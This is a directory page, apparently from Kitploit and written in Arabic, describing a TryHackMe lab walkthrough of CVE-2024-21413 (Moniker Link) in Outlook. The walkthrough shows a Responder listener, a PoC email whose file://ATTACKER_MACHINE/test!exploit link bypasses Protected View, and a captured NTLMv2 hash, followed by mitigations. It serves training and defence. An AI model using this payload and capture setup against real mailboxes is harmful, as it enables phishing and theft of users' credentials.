Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
tryhackme-monikerlink-writeup — شرح تمرين TryHackMe لثغرة Moniker Link (CVE-2024-21413): تجاوز العرض المحمي في Outlook مما يؤدي إلى التقاط هاش NTLMv2 عبر رابط moniker مُصمَّم خصيصًا. | Kitploit
أدوات/GitHubGitHub/omarmahmoud1024/tryhackme-monikerlink-writeup
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالالتصيد الاحتياليCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubomarmahmoud1024/tryhackme-monikerlink-writeup

tryhackme-monikerlink-writeup

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شرح تمرين TryHackMe لثغرة Moniker Link (CVE-2024-21413): تجاوز العرض المحمي في Outlook مما يؤدي إلى التقاط هاش NTLMv2 عبر رابط moniker مُصمَّم خصيصًا.

عرض المستودع
منذ 15 أياملم تتم المراجعة بعد

TryHackMe: Moniker Link — دليل حل CVE-2024-21413

دليل كامل لغرفة TryHackMe "Moniker Link": استغلال CVE-2024-21413، وهي ثغرة في Microsoft Outlook عام 2024، لسرقة تجزئة NTLMv2 للضحية في اللحظة التي ينقر فيها على رابط في بريد تصيد — بدون ماكرو، بدون مرفق، وبدون تحذير أمني واضح.

CVE-2024-21413 ("Moniker Link") هي ثغرة في طريقة تحقق Outlook من روابط file:// التي تستخدم صيغة Windows OLE "moniker" (علامة ! زائدة بعد المسار، مثل file://host/share!something). من المفترض أن يفتح Outlook روابط الملفات الخارجية عبر Protected View، الذي يعزل الملف ويحذر المستخدم قبل أي تسريب لبيانات الاعتماد. العلامة ! الإضافية تكسر محلل URLs الخاص بـ Outlook بما يكفي فقط لتجاوز Protected View بالكامل وتسليم الرابط مباشرة إلى Windows، الذي — لأنه يبدو كمسار UNC — يحاول بصمت مصادقة SMB ضد خادم المهاجم. محاولة المصادقة تلك تسرّب تجزئة NTLMv2 للضحية قبل أن يفعل الضحية أي شيء سوى النقر على رابط يبدو عاديًا.

هيكل الغرفة

المهمةالهدف
1. الاستطلاعفهم CVE وكيف تتجاوز ثغرة تحليل روابط moniker العرض المحمي Protected View
2. إعداد المستمعتشغيل Responder لالتقاط مصادقة SMB الصادرة
3. التسليحإنشاء بريد تصيد يحتوي على رابط moniker خبيث
4. التسليمإرسال البريد إلى صندوق بريد الضحية
5. الالتقاطجعل الضحية تنقر على الرابط والتقاط تجزئة NTLMv2 الخاصة بها

الشرح

1. إعداد المستمع

root@kitploit:~
responder -I ens5

يتم تشغيل Responder على واجهة جهاز المهاجم قبل إرسال أي شيء، مع تفعيل تسميم LLMNR وNBT-NS وDNS. هذا هو ما يلتقط تسريب بيانات الاعتماد فعليًا: فبمجرد أن تخدع الثغرة Outlook لدفعه إلى محاولة مصادقة SMB ضد عنوان IP الخاص بالمهاجم، يكون Responder هو ما يستمع على الطرف الآخر لالتقاطها.

Responder يستمع على ens5

1. الاستطلاع — صندوق بريد الضحية

الهدف هو صندوق بريد Outlook قياسي، [email protected]، في عرض صندوق الوارد الطبيعي قبل وصول أي بريد تصيد — وهو الخط الأساسي الذي تنطلق منه بقية الغرفة.

صندوق وارد Outlook للضحية قبل الهجوم

3. التسليح — سكربت الاستغلال

root@kitploit:~
sender_email = '[email protected]'
receiver_email = '[email protected]'
...
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

الاستغلال (PoC العام لـ CVE-2024-21413 من CMNatic) هو سكربت Python صغير ينشئ بريدًا إلكترونيًا HTML ويرسله عبر SMTP. الحمولة كلها في سطر واحد: رابط <a href="file://..."> موجه إلى جهاز المهاجم، مع !exploit زائدة في نهاية المسار. علامة ! الزائدة هذه هي الخلل بأكمله — وهي ما يجعل محلل روابط Outlook يخطئ في تصنيف URL ويتجاوز فحص Protected View الذي كان سيطبقه عادةً على رابط ملف خارجي.

مصدر exploit.py في nano

4. التسليم — إرسال البريد

root@kitploit:~
python3 exploit.py
Enter your attacker email password: attacker
Email delivered

تشغيل السكربت يُجري مصادقة على خادم البريد ويرسل البريد المُصمَّم إلى الضحية. يؤكد Email delivered أن البريد غادر صندوق بريد المهاجم بنجاح.

تشغيل exploit.py، تم تسليم البريد

4. التسليم — الوصول إلى صندوق بريد الضحية

يصل البريد إلى صندوق وارد [email protected] من CMNatic، بموضوع CVE-2024-21413، ولا يحتوي سوى على رابط تشعبي واحد نصه "انقرني" — بدون مرفق، وبدون تحذير ماكرو، ولا شيء قد يجعل مرشح التصيد أو مستخدمًا حذرًا يشتبه في الأمر عادةً.

بريد تصيد مستلم في صندوق بريد الضحية

5. الالتقاط — ينقر الضحية على الرابط

النقر على "انقرني" يستدعي مربع خطأ Windows Explorer في Outlook: "لا يمكننا العثور على '\10.113.72.84\test!exploit'. يرجى التأكد من استخدام الموقع أو عنوان الويب الصحيح." هذا الخطأ هو في الواقع دليل على أن الاستغلال نجح بالفعل — فعندما يظهر هذا الحوار، يكون Windows قد حاول بالفعل تحليل مسار UNC عبر SMB وقام بالفعل بالمصادقة على 10.113.72.84 (جهاز المهاجم) أثناء ذلك. الفشل الظاهر هو مجرد فشل Explorer في العثور على مشاركة لم يكن من المفترض أن توجد أصلًا؛ تسريب بيانات الاعتماد حدث بالفعل بصمت قبل ظهور صندوق الخطأ.

خطأ Outlook الخاص بعدم العثور على مسار UNC بعد النقر على الرابط

5. الالتقاط — التقاط التجزئة في Responder

root@kitploit:~
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash     : tryhackme::THM-MONIKERLINK:3f2abcd40483ccba:...

بالعودة إلى جهاز المهاجم، يكون Responder قد التقط بالفعل مصافحة NTLMv2-SSP الكاملة لـ THM-MONIKERLINK\tryhackme، مصدرها 10.113.150.143 (الضحية). لا موجه بيانات اعتماد، ولا تحذير أمني، ولا إجراء من المستخدم سوى نقرة واحدة على رابط بدا عاديًا — كانت التجزئة جاهزة للكسر أو الترحيل في اللحظة التي أساء فيها Outlook التعامل مع رابط moniker.

Responder يلتقط تجزئة NTLMv2

الأدوات المستخدمة

  • Responder — تسميم LLMNR/NBT-NS/DNS والتقاط مصادقة SMB
  • سكربت Python SMTP مخصص (PoC العام لـ CVE-2024-21413 من CMNatic) — ينشئ ويسلّم بريد moniker الخبيث
  • Microsoft Outlook (عميل الضحية) — المكوّن القابل للاستغلال؛ الإصدار المتأثر بـ CVE-2024-21413 قبل تصحيح Microsoft في فبراير 2024

الدروس الرئيسية

  • علامة زائدة واحدة (!) كانت الثغرة بأكملها. CVE-2024-21413 تذكير جيد بأن محللات URL/المسارات مصدر شائع لتجاوز الحدود الأمنية — لا يحتاج الإدخال غير الصالح إلى أن يكون معقدًا ليتسلل عبر فحص، بل يكفي أن يصل إلى مسار برمجي لا يغطيه الفحص.
  • يوجد Protected View تحديدًا لوقف هذا النوع من الهجمات، وكان التأثير الحقيقي للثغرة هو تجاوزه بصمت وليس تسريب NTLM نفسه — ترحيل/التقاط NTLM من رابط file:// تقنية قديمة؛ ما جعل هذه الـ CVE بارزة هو أن Outlook لم يكن من المفترض أن يسمح للرابط بالعمل دون أي تحذير.
  • مصادقة NTLM تسرّب بيانات الاعتماد بمجرد محاولتها، حتى لو كانت "المشاركة" على الطرف الآخر غير موجودة. لم يُدخل الضحية كلمة مرور أبدًا ولم يرَ موجه تسجيل دخول؛ سلّم Windows تجزئة NTLMv2 تلقائيًا كجزء من محاولة (فاشلة) لتصفح مسار UNC.
  • هذا هجوم شبه صفري النقرات من منظور الضحية — نقرة واحدة على رابط بدون مرفق وبدون ماكرو وبدون أي علامة خطر واضحة كانت كافية. التصحيح (أصلحت Microsoft ذلك في تحديث فبراير 2024) وتعطيل مصادقة NTLM الصادرة إلى المضيفين غير الموثوقين هما التخفيفان الحقيقيان؛ تدريب المستخدمين وحده لم يكن ليوقف هذا الهجوم، لأن شيئًا في البريد لم يبدُ غير معتاد.
تنزيل الأداة